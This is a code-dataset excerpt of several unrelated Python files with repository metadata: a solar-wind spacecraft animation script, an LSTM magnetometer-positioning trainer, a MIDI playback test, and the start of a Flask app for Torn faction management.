    ax.scatter(pos.venus[1,timeind], pos.venus[0,timeind], s=50, c='orange', alpha=1, lw=0)
    ax.scatter(pos.mercury[1,timeind], pos.mercury[0,timeind], s=50, c='dimgrey', alpha=1,lw=0)
    ax.scatter(pos.messenger[1,timeind], pos.messenger[0,timeind], s=25, c='dimgrey', alpha=1,lw=0,marker='s')
    ax.scatter(pos.sta[1,timeind], pos.sta[0,timeind], s=25, c='red', alpha=1,lw=0, marker='s')
    ax.scatter(pos.stb[1,timeind], pos.stb[0,timeind], s=25, c='royalblue', alpha=1,lw=0, marker='s')
    ax.scatter(pos.earth[1,timeind], pos.earth[0,timeind], s=50, c='mediumseagreen', alpha=1,lw=0)
    ax.scatter(pos.mars[1,timeind], pos.mars[0,timeind], s=50, c='orangered', alpha=1,lw=0)
    ax.scatter(pos.ulysses[1,timeind], pos.ulysses[0,timeind], s=25, c='darkolivegreen', alpha=1,lw=0,marker='s')
    ax.scatter(pos.msl[1,timeind], pos.msl[0,timeind], s=25, c='magenta', alpha=1,lw=0,marker='s')
    ax.scatter(pos.maven[1,timeind], pos.maven[0,timeind], s=25, c='steelblue', alpha=1,lw=0, marker='s')
    ax.scatter(pos.rosetta[1,timeind], pos.rosetta[0,timeind], s=25, c='black', alpha=1,lw=0, marker='s')

    #set axes
    plt.thetagrids(range(0,360,45),(u'0\u00b0 HEEQ longitude',u'45\u00b0',u'90\u00b0',u'135\u00b0',u'+/- 180\u00b0',u'-135\u00b0',u'-90\u00b0',u'-45\u00b0'), fmt='%d', frac = 1.05,fontsize=10)
    ax.set_theta_zero_location('S')
    ax.set_ylim(0, 1.8)
    plt.rgrids((0.4,0.7,1.0,1.3,1.6),('0.4','0.7','1.0','1.3','1.6 AU'),fontsize=10)

    #plot text for date extra so it does not move
    #year
    plt.figtext(0.47-0.22,0.9,frame_time_str[0:4], fontsize=13, ha='center')
    #month
    plt.figtext(0.51-0.22,0.9,frame_time_str[5:7], fontsize=13, ha='center')
    #day
    plt.figtext(0.54-0.22,0.9,frame_time_str[8:10], fontsize=13, ha='center')
    #hours
    plt.figtext(0.57-0.22,0.9,frame_time_str[11:13], fontsize=13, ha='center')
    #mysignature
    plt.figtext(0.96,0.01,r'$C. M\ddot{o}stl$', fontsize=7, ha='center')

    ############# 5 in situ data plots: +/- 3 day window around the frame time
    plotstartdate=mdates.num2date(frame_time_num+k-3)
    plotenddate=mdates.num2date(frame_time_num+k+3)

    #slicing: take only those indices where the difference to frame_time_num+k is less than 3 days
    mes_ind_plot=np.where(abs(mes_time-(frame_time_num+k)) < 3)
    vex_ind_plot=np.where(abs(vex_time-(frame_time_num+k)) < 3)
    stb_ind_plot=np.where(abs(stb_time-(frame_time_num+k)) < 3)
    sta_ind_plot=np.where(abs(sta_time-(frame_time_num+k)) < 3)
    wind_ind_plot=np.where(abs(wind_time-(frame_time_num+k)) < 3)

    #MESSENGER panel
    ax2 = plt.subplot2grid((5,2), (0, 1))
    ax2.plot_date(mes_time[mes_ind_plot],mes.btot[mes_ind_plot],'-k', lw=0.3)
    ax2.plot_date(mes_time[mes_ind_plot],mes.bx[mes_ind_plot], '-r',lw=0.3)
    ax2.plot_date(mes_time[mes_ind_plot],mes.by[mes_ind_plot],'-g',lw=0.3)
    ax2.plot_date(mes_time[mes_ind_plot],mes.bz[mes_ind_plot],'-b',lw=0.3)
    plt.tick_params( axis='x', labelbottom='off')
    plt.yticks(fontsize=9)
    plt.ylabel('B SCEQ [nT]', fontsize=9)
    #vertical line marks the current frame time
    ax2.plot_date([mdates.num2date(frame_time_num+k),mdates.num2date(frame_time_num+k)], [-120,120],'-k', lw=0.5, alpha=0.8)
    plt.xlim((plotstartdate, plotenddate))
    plt.ylim((-120, 120))

    #VEX panel
    ax3 = plt.subplot2grid((5,2), (1, 1))
    ax3.plot_date(vex_time[vex_ind_plot],vex.btot[vex_ind_plot],'-k', lw=0.3)
    ax3.plot_date(vex_time[vex_ind_plot],vex.bx[vex_ind_plot], '-r',lw=0.3)
    ax3.plot_date(vex_time[vex_ind_plot],vex.by[vex_ind_plot],'-g',lw=0.3)
    ax3.plot_date(vex_time[vex_ind_plot],vex.bz[vex_ind_plot],'-b',lw=0.3)
    plt.tick_params( axis='x', labelbottom='off')
    plt.yticks(fontsize=9)
    plt.ylabel('B SCEQ [nT]', fontsize=9)
    ax3.plot_date([mdates.num2date(frame_time_num+k),mdates.num2date(frame_time_num+k)], [-50,50],'-k', lw=0.5, alpha=0.8)
    plt.xlim((plotstartdate, plotenddate))
    plt.ylim((-50, 50))

    #Earth (Wind) panel
    ax4 = plt.subplot2grid((5,2), (2, 1))
    ax4.plot_date(wind_time[wind_ind_plot],wind.btot[wind_ind_plot],'-k', lw=0.3)
    ax4.plot_date(wind_time[wind_ind_plot],wind.bx[wind_ind_plot], '-r',lw=0.3)
    ax4.plot_date(wind_time[wind_ind_plot],wind.by[wind_ind_plot],'-g',lw=0.3)
    ax4.plot_date(wind_time[wind_ind_plot],wind.bz[wind_ind_plot],'-b',lw=0.3)
    plt.tick_params( axis='x', labelbottom='off')
    plt.yticks(fontsize=9)
    plt.ylabel('B SCEQ [nT]', fontsize=9)
    ax4.plot_date([mdates.num2date(frame_time_num+k),mdates.num2date(frame_time_num+k)], [-50,50],'-k', lw=0.5, alpha=0.8)
    plt.xlim((plotstartdate, plotenddate))
    plt.ylim((-35, 35))

    #STA panel
    ax5 = plt.subplot2grid((5,2), (3, 1))
    ax5.plot_date(sta_time[sta_ind_plot],sta.btot[sta_ind_plot],'-k', lw=0.3)
    ax5.plot_date(sta_time[sta_ind_plot],sta.bx[sta_ind_plot], '-r',lw=0.3)
    ax5.plot_date(sta_time[sta_ind_plot],sta.by[sta_ind_plot],'-g',lw=0.3)
    ax5.plot_date(sta_time[sta_ind_plot],sta.bz[sta_ind_plot],'-b',lw=0.3)
    plt.tick_params( axis='x', labelbottom='off')
    plt.yticks(fontsize=9)
    plt.ylabel('B SCEQ [nT]', fontsize=9)
    ax5.plot_date([mdates.num2date(frame_time_num+k),mdates.num2date(frame_time_num+k)], [-50,50],'-k', lw=0.5, alpha=0.8)
    plt.xlim((plotstartdate, plotenddate))
    plt.ylim((-35, 35))

    #STB panel (bottom row keeps its x tick labels with a month-day format)
    ax6 = plt.subplot2grid((5,2), (4, 1))
    ax6.plot_date(stb_time[stb_ind_plot],stb.btot[stb_ind_plot],'-k', lw=0.3)
    ax6.plot_date(stb_time[stb_ind_plot],stb.bx[stb_ind_plot], '-r',lw=0.3)
    ax6.plot_date(stb_time[stb_ind_plot],stb.by[stb_ind_plot],'-g',lw=0.3)
    ax6.plot_date(stb_time[stb_ind_plot],stb.bz[stb_ind_plot],'-b',lw=0.3)
    plt.xlim((plotstartdate, plotenddate))
    myformat = mdates.DateFormatter('%m-%d')
    ax6.xaxis.set_major_formatter(myformat)
    plt.yticks(fontsize=9)
    plt.ylabel('B SCEQ [nT]', fontsize=9)
    ax6.plot_date([mdates.num2date(frame_time_num+k),mdates.num2date(frame_time_num+k)], [-50,50],'-k', lw=0.5, alpha=0.8)
    plt.ylim((-35, 35))
    plt.xticks(fontsize=10)

    #labeling of spacecraft and longitude in HEEQ
    plt.figtext(0.92,0.82,'MESSENGER',color='dimgrey', fontsize=10, ha='left')
    plt.figtext(0.94,0.77,"%d" % (pos.messenger[1,timeind]*180/np.pi),color='black', fontsize=10, ha='right')
    plt.figtext(0.92,0.82-0.165,'VEX',color='orange', fontsize=10, ha='left')
    plt.figtext(0.94,0.77-0.165,"%d" % (pos.venus[1,timeind]*180/np.pi),color='black', fontsize=10, ha='right')
    plt.figtext(0.92,0.82-0.165*2,'Wind',color='mediumseagreen', fontsize=10, ha='left')
    plt.figtext(0.94,0.77-0.165*2,"%d" % (pos.earth[1,timeind]*180/np.pi),color='black', fontsize=10, ha='right')
    plt.figtext(0.92,0.82-0.165*3,'STEREO-A',color='red', fontsize=10, ha='left')
    plt.figtext(0.94,0.77-0.165*3,"%d" % (pos.sta[1,timeind]*180/np.pi),color='black', fontsize=10, ha='right')
    plt.figtext(0.92,0.82-0.165*4,'STEREO-B',color='royalblue', fontsize=10, ha='left')
    plt.figtext(0.94,0.77-0.165*4,"%d" % (pos.stb[1,timeind]*180/np.pi),color='black', fontsize=10, ha='right')

    #labeling in situ components
    plt.figtext(0.75,0.92,'Bx',color='red', fontsize=10, ha='left')
    plt.figtext(0.8,0.92,'By',color='green', fontsize=10, ha='left')
    plt.figtext(0.85,0.92,'Bz',color='blue', fontsize=10, ha='left')

    #save figure for frame - frame numbering starts with zero at the start time
    framestr = '%04i' % (k*4)
    #framenr=framenr+1
    print( 'frame nr.', framestr)
    #plt.show()
    if fade >0:
        plt.savefig('animations/animation_icmecat_6hour_fade_circ_insitu_final_full/icmecat_'+framestr+'.png', dpi=300)
        #plt.savefig('animations/animation_icmecat_6hour_fade_circ_insitu_final_full/icmecat_'+framestr+'.jpg', dpi=300)
    # if keep >0:
    #  plt.savefig('animations/animation_icmecat_6hour_keep_circ_insitu_final_full/icmecat_'+framestr+'.jpg', format='jpg', dpi=300)
    end=time.time()
    print( 'took time in seconds:', (end-start) ,'for this frame')
    #clears plot window for the next frame
    plt.clf()

############end of frame cycle
#make animation: convert with automator into jpg before
#os.system('/Users/chris/movie/ffmpeg -r 15 -i /Users/chris/python/catpy/animations/animation_icmecat_6hour_fade_circ_insitu_final_full_jpg/icmecat_%04d.jpg -b 5000k -r 15 animations/icmecat_anim_6hour_fade_circ_insitu_final_full.mp4 -y')
print( 'made movie')
print( 'end icmecat animation program.')
#/Users/chris/movie/ffmpeg -r 15 -i /Users/chris/python/catpy/animations/animation_icmecat_6hour_fade_circ_insitu_all/icmecat_%04d.jpg -b 5000k -r 15 animations/icmecat_anim_6hour_fade_circ_insitu_all.mp4 -y
| cmoestl/heliocats | scripts/icmecat_anim_circles_insitu_final_full.py | icmecat_anim_circles_insitu_final_full.py | py | 23,948 | python | en | code | 10 | github-code | 36 | [
{
"api_name": "scipy.io.readsav",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "scipy.io",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "scipy.io.readsav",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "scipy.io",
"line_... |
30494220256 | import pandas as pd
import numpy as np
import tensorflow as tf
import time
import os
import csv
from sklearn.preprocessing import MinMaxScaler
from keras.layers import Input
from keras.layers import Dense, LSTM, Dropout, Embedding, Input, Activation, Bidirectional, TimeDistributed, RepeatVector, Flatten
from keras.optimizers import Adam
from sklearn.metrics import mean_squared_error
from math import sqrt
from keras.models import Sequential, Model
# Training hyper-parameters
learning_rate=0.001  # Adam step size
look_back=20  # sliding-window length in timesteps
batch_size=5  # windowed sets are trimmed to a multiple of this
hidden_nodes = 256  # presumably consumed by model_build (not visible here) -- TODO confirm
epochs = 100  # outer training iterations in model_train
adam = Adam(lr=learning_rate)
def create_dataset_input(dataset, look_back):
    """Slice *dataset* into overlapping windows of length *look_back*.

    Produces ``len(dataset) - look_back`` consecutive windows and returns
    them stacked in a numpy array.
    """
    windows = [dataset[start:start + look_back]
               for start in range(len(dataset) - look_back)]
    return np.array(windows)
def mode_decide(input_mode):
    """Parse a '<train>-<val>' mode string into a mode dictionary.

    Each part must be one of 'a', 'b' or 'ab' (dataset selection).

    :param input_mode: e.g. 'a-b' or 'ab-a'
    :return: {'train_set': <train>, 'val_set': <val>}
    :raises ValueError: if the string is malformed or either part is invalid.

    Fix: the original checked *train_mode* twice (copy-paste bug), so an
    invalid validation mode was silently accepted.
    """
    train_mode, val_mode = input_mode.split('-', 1)
    valid_modes = ('a', 'b', 'ab')
    if train_mode not in valid_modes or val_mode not in valid_modes:
        raise ValueError  # Wrong input mode type
    return {'train_set': train_mode, 'val_set': val_mode}
def load_data(mode):
    """Read the training and validation CSV files selected by *mode*.

    :param mode: dict with 'train_set' and 'val_set' keys ('a'/'b'/'ab')
    :return: (train_data, val_data) pandas DataFrames
    """
    train_name = mode['train_set'] + '_train_set' + '.csv'
    val_name = mode['val_set'] + '_val_set' + '.csv'
    train_data = pd.read_csv(train_name)
    val_data = pd.read_csv(val_name)
    return train_data, val_data
def _scale_column(frame, column):
    """Return *column* of *frame* as a float column vector min-max scaled to [0, 1]."""
    raw = np.array(frame[column]).astype(float).reshape(-1, 1)
    return MinMaxScaler().fit_transform(raw)


def data_prepocess(train_data, val_data, batch_size=batch_size, look_back=look_back):
    """Scale, window and batch-trim the magnetometer/location data.

    Features (X) are the three geomagnetic components, targets (Y) are the
    2-D locations; both are cut into sliding windows of *look_back* steps
    and the sets are truncated to a multiple of *batch_size* (required for
    stateful LSTM training).

    :return: (trainX, trainY, testX, testY) numpy arrays of shape
             (samples, look_back, 3) for X and (samples, look_back, 2) for Y.

    Fix: the original scaled the training magnetometer columns but then
    windowed the UNSCALED values (the scaled ``Mag_x/y/z`` were never used),
    while the validation branch windowed the SCALED values — train and
    validation features were therefore on different scales.  Both are now
    scaled consistently.
    """
    # Scale every column independently to [0, 1].
    train_loc_x = _scale_column(train_data, 'Loc_x')
    train_loc_y = _scale_column(train_data, 'Loc_y')
    train_mag = [_scale_column(train_data, c) for c in ('GeoX', 'GeoY', 'GeoZ')]

    val_loc_x = _scale_column(val_data, 'Loc_x')
    val_loc_y = _scale_column(val_data, 'Loc_y')
    val_mag = [_scale_column(val_data, c) for c in ('GeoX', 'GeoY', 'GeoZ')]

    # Sliding windows; the three field components are stacked on the last axis.
    trainX = np.concatenate(
        [create_dataset_input(m, look_back=look_back) for m in train_mag], axis=2)
    testX = np.concatenate(
        [create_dataset_input(m, look_back=look_back) for m in val_mag], axis=2)

    trainY = np.concatenate(
        [create_dataset_input(train_loc_x, look_back=look_back),
         create_dataset_input(train_loc_y, look_back=look_back)], axis=2)
    testY = np.concatenate(
        [create_dataset_input(val_loc_x, look_back=look_back),
         create_dataset_input(val_loc_y, look_back=look_back)], axis=2)
    trainY = np.reshape(trainY, (len(trainY), look_back, 2))

    # Trim both sets to a whole number of batches.
    length_train = len(trainX) - (len(trainX) % batch_size)
    length_test = len(testX) - (len(testX) % batch_size)
    return (trainX[0:length_train], trainY[0:length_train],
            testX[0:length_test], testY[0:length_test])
def model_train(train_x, train_y, test_x, test_y,file_structure,file_acc2loss):
    """Train the stateful LSTM for `epochs` passes, logging loss/acc to a CSV.

    Each "epoch" is a single model.fit() call with epochs=1 so the LSTM state
    can be reset manually between passes (required for stateful=True).
    Appends one row per epoch to file_acc2loss, writing a header first if the
    file is empty.  Returns the trained model.

    NOTE(review): test_x/test_y and file_structure are accepted but never
    used in this body — presumably kept for a validation/plotting variant.
    """
    model=model_build()
    for i in range(epochs):
        # shuffle=False keeps sample order, which stateful LSTMs depend on.
        history = model.fit(train_x, train_y, batch_size=batch_size, epochs = 1, verbose=1,shuffle = False) #validation_split=0.1, validation_data=(test_x, test_y)
        # # need to reset state for every epoch
        model.reset_states()
        # #print('hidden_state:',hidden_state)
        # # list all data in history
        # '''
        # print('history.keys()',hist.history.keys())
        # # summarize history for accuracy
        # plt.plot(hist.history['acc'])
        # plt.plot(hist.history['val_acc'])
        # plt.title('model accuracy')
        # plt.ylabel('accuracy')
        # plt.xlabel('epoch')
        # plt.legend(['train', 'test'], loc='upper left')
        # plt.show()
        # '''
        print('Real Epoches:',i+1)
        # Append this epoch's metrics; emit a header row only on first write.
        with open(file_acc2loss,'a', newline='') as csvfile:
            if not os.path.getsize(file_acc2loss): #file is empty
                spamwriter = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_NONE)
                spamwriter.writerow(['epochs','loss','acc'])#, 'val_loss','val_acc'
            data = ([
                i,history.history['loss'][0],history.history['acc'][0]#, history.history['val_loss'][0], history.history['val_acc'][0]
            ])
            spamwriter = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_NONE)
            spamwriter.writerow(data)
    return model
def model_build(hidden_nodes=hidden_nodes,batch_size=batch_size , time_steps = look_back, feature_size = 3):
    """Build and compile a stateful two-layer LSTM sequence regressor.

    Input shape is (batch_size, time_steps, feature_size) — three magnetometer
    channels per step — and the output is a TimeDistributed Dense(2), i.e. a
    (loc_x, loc_y) pair for every timestep.

    BUGFIX: Model() was called with `input=inputs1`; the keyword is `inputs`
    (a TypeError under tf.keras / Keras 2.x).
    BUGFIX: the Input layer hard-coded the global `look_back` instead of the
    `time_steps` parameter; now uses the parameter (default is still look_back,
    so existing callers are unaffected).
    """
    inputs1 = Input(batch_shape = (batch_size, time_steps, feature_size))
    # First LSTM emits [sequence_output, state_h, state_c]; passing that list
    # to the next LSTM lets Keras treat h, c as its initial_state.
    # NOTE(review): confirm this list-splitting behavior for the Keras version in use.
    lstm1 = LSTM(hidden_nodes, stateful = True, return_sequences=True, return_state=True,dropout=0.2)(inputs1)
    lstm1 = LSTM(hidden_nodes,return_sequences=True,dropout=0.2)(lstm1)
    lstm1 = TimeDistributed(Dense(2))(lstm1)
    model = Model(inputs = inputs1, outputs = lstm1)
    print(model.layers)
    model.compile(loss='mean_squared_error', optimizer=adam,metrics=['acc'])
    model.summary()
    return model
if __name__=='__main__':
    # Build the list of "train-val" mode strings to run; `change` gates the
    # interactive prompt (off by default, so 'a-b' is used).
    input_mode=[]
    change=False
    if change:
        # BUGFIX: prompt typo "inport" -> "import".
        chosen = input('Please import train and val mode in _-_(e.g:a-b)\n')
        if chosen == 'all':
            input_mode = ['a-a','a-b','a-ab','b-a','b-b','b-ab','ab-a','ab-b','ab-ab']
        else:
            # BUGFIX: previously the raw string fell through unchanged and the
            # for-loop below iterated over its characters; wrap it in a list.
            input_mode = [chosen]
    else:
        input_mode=['a-b']
    for t_v in input_mode:
        mode=mode_decide(t_v)
        # Per-mode output filenames (was a 1-element list fed through "".join).
        file_structure = mode['train_set']+'-'+mode['val_set']+'_'+'model_ts=30_256_5_100.png'
        file_acc2loss = mode['train_set']+'-'+mode['val_set']+'_'+'log_ts=30_256_5_100.csv'
        train_data,val_data=load_data(mode)
        train_x, train_y, test_x, test_y=data_prepocess(train_data,val_data)
        model=model_train(train_x, train_y, test_x, test_y,file_structure,file_acc2loss)
        # Free the model before the next mode's run.
        del model
| MeichenBu/2018-2019-SURF | CNN+LSTM/LSTM_old.py | LSTM_old.py | py | 7,596 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "keras.optimizers.Adam",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
... |
4724184190 | import sys
# Make user-installed packages visible before importing mido.
sys.path.append('/usr/local/lib/python3.7/site-packages')
import mido
import time

# Open the virtual output port and play a fixed phrase of MIDI note numbers,
# one note every half second (quarter-second gap, quarter-second hold).
outport = mido.open_output('VirtualDevice Bus 1')
note_sequence = [57, 59, 60, 62, 57, 59, 55, 57]
for pitch in note_sequence:
    time.sleep(0.25)
    strike = mido.Message('note_on', note=pitch, velocity = 100)
    outport.send(strike)
    time.sleep(0.25)
    release = mido.Message('note_off', note=pitch, velocity = 100)
    outport.send(release)
| krispenney/midi | test.py | test.py | py | 404 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 2,
"usage_type": "attribute"
},
{
"api_name": "mido.open_output",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_nu... |
14640804692 | import logging
import logging.handlers
from flask import Flask, render_template, redirect, request
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager, UserMixin, login_user, login_required, logout_user, current_user
from forms import LoginForm, PaymentForm, PasswordForm, OccalcForm, ApikeyForm, DeleteForm, RegisterForm, OCpolicyForm, LeaderForm, EnemyForm, TimeForm, DeleteEnemyForm, AddEnemyForm
import base64
import datetime
import hashlib
import hmac
import json
import pandas as pd
import re
import sqlite3
import time
import read_sqlite
import dehtml
import random
import password
import challenge
# NOTE(review): attaching an attribute to the stdlib `re` module is a global
# monkey-patch; the rest of this file relies on re.numeric, so it is kept.
re.numeric = re.compile('^[0-9]+$')
# Signed URL tokens — each pattern ends in a hex HMAC verified server-side.
token = re.compile('^([-\d]+)([a-z]+)(\d+)-([0-9a-f]+)$') # used for graphs
combat_token = re.compile('^([-\d]+)-([-\d]+)([a-z]+)(\d+)-([0-9a-f]+)$') # used for combat events
bonus_token = re.compile('^([-\d]+)-([-\d]+)bonus(\d+)-([0-9a-f]+)$') # used for chain bonus record
armory_token = re.compile('^([-\d]+)-(\d+)-([0-9a-f]+)$')
enemy_token = re.compile('^([-\d]+)-(\d+)-(\d+)-([0-9a-f]+)$')
target_token = re.compile('^([-\d]+)-(\d+)-(\d+)-(\d+)-([0-9a-f]+)$')
time_interval = re.compile('^(\d+)-(\d+)$')
# f_id, crimetype, timestamp, (either number or 'history'), hmac
oc_history_picker = re.compile('^([-\d]+)-([0-9])-([0-9]+)-([0-9a-z]+)-([0-9a-f]+)$')
chain_token = re.compile('^(\d+)-chain-(\d+)-(\d+)-([0-9a-f]+)$')
chain_token_o = re.compile('^(\d+)-scoreboard-(\d+)-(\d+)-([0-9a-f]+)-([a-z]+)$') # with ordering parameter
# Captured once at import time — NOT the current time of a request.
now = int(time.time())
# Now there is just one way to read this.
# HMAC key is read from the sqlite side once, then the reader is dropped.
rodb = read_sqlite.Rodb()
hmac_key = rodb.getkey()
rodb = None
# Flask app, rotating file log, SQLAlchemy ORM and Flask-Login wiring.
app = Flask(__name__)
app.config.from_pyfile('config.py')
loghandler = logging.handlers.RotatingFileHandler('/home/peabrain/logs/tu0036.log', maxBytes=1024 * 1024, backupCount=10)
loghandler.setLevel(logging.INFO)
app.logger.setLevel(logging.INFO)
app.logger.addHandler(loghandler)
db = SQLAlchemy(app)
login_manager = LoginManager()
login_manager.init_app(app)
class LUser(UserMixin, db.Model):
    """Login account; username is the player's numeric Torn id.

    "et" columns hold epoch-second timestamps.
    """
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(30), unique=True) # torn numeric id
    login_allowed = db.Column(db.Integer) # int used as bool
    must_change_pw = db.Column(db.Integer) # int used as bool
    pwhash = db.Column(db.String(255)) # a hash
    registered = db.Column(db.Integer) # et account created
    confirmed = db.Column(db.Integer) # et confirmed, or 0 if not confirmed
    last_login = db.Column(db.Integer) # et
    failed_logins = db.Column(db.Integer) # reset to 0 on success
    pw_ver = db.Column(db.Integer) # 1=sha1, 2=bcrypt
    #
    # see is_authenticated() is_anonymous() get_id()
class Payment_cache(db.Model):
    """ORM record of an organised-crime payment (faction/plan, when, by whom)."""
    id = db.Column(db.Integer, primary_key=True)
    faction_id = db.Column(db.Integer)
    oc_plan_id = db.Column(db.Integer)
    timestamp = db.Column(db.Integer) # et of the payment record
    paid_by = db.Column(db.Integer) # player id
class Report_number_oc(db.Model):
    """Self-reported OC-calculation number for a player (written by /set_oc_calc,
    read back by /settings)."""
    id = db.Column(db.Integer, primary_key=True)
    timestamp = db.Column(db.Integer) # et when reported
    pid = db.Column(db.Integer) # player id
    number_oc = db.Column(db.Integer)
class Banned_pw(db.Model):
    """SHA-1 digests of passwords that may no longer be (re)used."""
    id = db.Column(db.Integer, primary_key=True)
    sha = db.Column(db.String(40)) # sha1 of a prohibited pw
class Apikey_history(db.Model):
    """Latest API-key set/delete event per user, so /settings can show key
    state ahead of the next sqlite refresh."""
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(30))
    et_web_update = db.Column(db.Integer) # et of the web-side change
    deleted = db.Column(db.Integer) # 1 = key delete requested
class Ocpolicy(db.Model):
    """Pending OC payment-policy change made via /pay_policy (cached until
    the sqlite side catches up)."""
    id = db.Column(db.Integer, primary_key=True)
    faction = db.Column(db.Integer)
    timestamp = db.Column(db.Integer) # et when set
    percent = db.Column(db.Numeric(6,2)) # payout percentage
    username = db.Column(db.String(30)) # who set it
    octype = db.Column(db.Integer) # OC type key (see get_oc_titles)
class Extra_leaders(db.Model):
    """Append-only promote/demote events; the newest row (largest et) per
    player decides whether they count as a leader."""
    id = db.Column(db.Integer, primary_key=True)
    et = db.Column(db.Integer) # epoch seconds of the change
    faction_id = db.Column(db.Integer)
    player_id = db.Column(db.Integer)
    is_leader = db.Column(db.Integer) # 1 = promoted, 0 = demoted
    set_by = db.Column(db.Integer) # player id of the leader who made the change
class Challenge(db.Model):
    """Pending in-game challenge a user must echo back (registration or
    password reset) before the corresponding action is applied.

    BUGFIX: the `pw_ver` column was declared twice; the duplicate assignment
    (which merely rebound the class attribute) has been removed.
    """
    id = db.Column(db.Integer, primary_key=True)
    et = db.Column(db.Integer) # epoch seconds when issued
    expires = db.Column(db.Integer) # epoch seconds; issued + 900 in callers
    used = db.Column(db.Integer)
    username = db.Column(db.String(30), unique=True) # torn numeric id
    action = db.Column(db.String(20)) # e.g. 'newuser', 'pwreset'
    data = db.Column(db.String(60)) # e.g. candidate pwhash for pwreset
    pw_ver = db.Column(db.Integer)
    chal_type = db.Column(db.String(10))
    expect = db.Column(db.String(40)) # exact challenge string expected back
class Response(db.Model):
    """A challenge response as provided by a user, to be matched against
    Challenge.expect by another job."""
    id = db.Column(db.Integer, primary_key=True)
    et = db.Column(db.Integer) # epoch seconds received
    used = db.Column(db.Integer)
    username = db.Column(db.String(30), unique=True) # torn numeric id
    chal_type = db.Column(db.String(10))
    provided = db.Column(db.String(40)) # the string the user supplied
class Enemy(db.Model):
    """An enemy player tracked for a faction (f_id)."""
    id = db.Column(db.Integer, primary_key=True)
    tornid = db.Column(db.String(30)) # torn numeric id
    username = db.Column(db.String(30))
    f_id = db.Column(db.Integer) # faction that tracks this enemy
class Timerange(db.Model):
    """A [tstart, tend] epoch-second interval associated with a faction."""
    id = db.Column(db.Integer, primary_key=True)
    tstart = db.Column(db.Integer)
    tend = db.Column(db.Integer)
    f_id = db.Column(db.Integer)
class Chains(db.Model):
    """One attack chain for a faction; pg_chain_id is the local key,
    torn_chain_id the id Torn assigned."""
    pg_chain_id = db.Column(db.Integer, primary_key=True)
    f_id = db.Column(db.Integer)
    et = db.Column(db.Integer) # epoch seconds recorded
    chain_len = db.Column(db.Integer)
    tstart = db.Column(db.Integer) # epoch seconds chain began
    tend = db.Column(db.Integer) # epoch seconds chain ended
    torn_chain_id = db.Column(db.Integer)
    respect = db.Column(db.String(16))
class Chain_player_sum(db.Model):
    """Per-player attack/defence totals within one chain (pg_chain_id)."""
    pk = db.Column(db.Integer, primary_key=True)
    pg_chain_id = db.Column(db.Integer)
    player_id = db.Column(db.Integer)
    actions = db.Column(db.Integer)
    attacked = db.Column(db.Integer)
    hospitalized = db.Column(db.Integer)
    mugged = db.Column(db.Integer)
    respect = db.Column(db.Integer)
    att_stale = db.Column(db.Integer)
    lost = db.Column(db.Integer)
    att_escape = db.Column(db.Integer)
    def_stale = db.Column(db.Integer)
    defend = db.Column(db.Integer)
    def_escape = db.Column(db.Integer)
class Chain_members(db.Model):
    """Membership roster of one chain: (pg_chain_id, player)."""
    mempk = db.Column(db.Integer, primary_key=True)
    pg_chain_id = db.Column(db.Integer)
    player_id = db.Column(db.Integer)
    player_name = db.Column(db.String(16))
class Bonus_events(db.Model):
    """A single bonus hit within a chain: attacker, defender, verb/outcome
    and the respect earned."""
    bonus_pk_id = db.Column(db.Integer, primary_key=True)
    pg_chain_id = db.Column(db.Integer)
    et = db.Column(db.Integer) # epoch seconds of the event
    att_name = db.Column(db.String(16))
    att_id = db.Column(db.Integer)
    verb = db.Column(db.String(16))
    def_name = db.Column(db.String(16))
    def_id = db.Column(db.Integer)
    outcome = db.Column(db.String(20))
    num_respect = db.Column(db.Numeric(12,4))
@login_manager.user_loader
def load_user(user_id):
    # Flask-Login callback: map the session-stored id to the full LUser row.
    return LUser.query.get(int(user_id)) # returns whole object
# End the logged-in session and send the browser back to the login page.
@app.route('/logout')
def logout():
    logout_user()
    return redirect('/')
#=================================================================================
def obtain_leaders_for_faction(pid, fid):
    """Return {player_id: [is_leader, et, name, set_by_name, when]} for faction fid.

    The Torn-recognised leader and co-leader are always present; extra leaders
    stored in the ORM are merged in using each player's most recent
    Extra_leaders row, and kept only if that latest row marks them a leader.
    """
    rodb = read_sqlite.Rodb()
    faction_sum = rodb.get_faction_for_player(pid)
    # Seed with the two leaders Torn itself reports.
    leaders = {
        faction_sum['leader']: [1, 1, faction_sum['leadername'], 'Torn', 'mists of time'],
        faction_sum['coleader']: [1, 1, faction_sum['coleadername'], 'Torn', 'mists of time'],
    }
    # Keep only the newest ORM record per player (largest et wins).
    latest = {}
    for row in Extra_leaders.query.filter_by(faction_id = fid).all():
        member = row.player_id
        if member not in latest or row.et > latest[member][1]:
            latest[member] = [row.is_leader, row.et,
                              rodb.pid2n[str(member)],
                              rodb.pid2n[str(row.set_by)],
                              time.strftime("%Y-%m-%d %H:%M", time.gmtime(row.et))]
    # Merge in players whose latest record still marks them as a leader.
    for member, record in latest.items():
        if record[0]:
            leaders[member] = record
    return leaders
#=================================================================================
def bool_leader(pid, fid):
    """True when player pid counts as a leader of faction fid."""
    return pid in obtain_leaders_for_faction(pid, fid)
#=================================================================================
@app.route('/', methods = ['GET','POST'])
@app.route('/login', methods = ['GET','POST'])
def login():
    """Render the login form and, on POST, authenticate the user.

    Success resets the failed-login counter and records the login time;
    failure increments the counter.  Unknown non-numeric usernames are
    reported as such on the bad-login page.
    """
    form = LoginForm()
    if form.validate_on_submit():
        try:
            u = request.form['username']
            p = request.form['password']
            reject = True # assume rejection
            allowed_login = False
        except Exception:
            app.logger.info('error reading from login form')
            return render_template('login.html', title='Sign In', form=form)
        wantuser = LUser.query.filter_by(username = u).first()
        if not wantuser:
            # unknown username
            if not re.numeric.match(u):
